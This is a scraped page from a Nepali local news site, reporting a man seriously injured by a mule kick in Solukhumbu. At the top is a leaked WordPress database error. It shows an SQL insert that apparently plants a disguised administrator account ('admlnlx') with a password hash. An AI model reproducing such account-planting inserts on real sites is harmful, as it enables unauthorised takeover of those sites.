WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAJNwjUsu7xipL8SGEKZcci9FMEi8h/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 12:12:34', '', 'admlnlx', 'admlnlx')

खच्चडले लात्ती हान्दा थुलुङ दुधकोशी गाउँपालिकामा एक जना गम्भिर घाईते – Gaule Khabar

खच्चडले लात्ती हान्दा थुलुङ दुधकोशी गाउँपालिकामा एक जना गम्भिर घाईते

खच्चडले लात्ती हान्दा थुलुङ दुधकोशी गाउँपालिकामा एक जना गम्भिर घाईते

गाउँले न्युज, ७ साउन, सोलुखुम्बु । सोलुखुम्बु थुलुङ दुधकोशी गाउँपालिका ६ बर्खुघाटमा खच्चडले लात्ती हान्दा एक जना गम्भिर घाईते भएका छन् ।

सोमबार राती खच्चडलाई दाना दिने क्रममा खच्चडले लात्ती हानेर ४५ बर्षिय जगं बहादुर राई घाईते भएको घाईतेकी श्रीमती बसन्ती राईले जानकारी दिए ।

घाइते राईलाई राती नै जिल्ला अस्पताल फाप्लु पुर्‍याएको थियो । जिल्ला अस्पातलमा उपचार सम्भव नभएपछि थप उपचारका लागी काठमाण्डौ पठाईएको छ ।

घाइतेको टाउँकोमा गम्भिर चोट लागेको अस्पतालले जनाएका्े छ । दिमाखमा रगत जमेको हुन सक्ने उपचारमा सलग्नं डा. रमिन महर्जनले बताए । उहाँको टाउकोमा ३ टाका लगाइएको छ भने छातीमा समेत चोट लागेको अस्पतालले जनाएको छ । घाईतेको अझै सम्म होस खुल्न सकेको छैन् ।

साभार:सोलु एफ एम

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका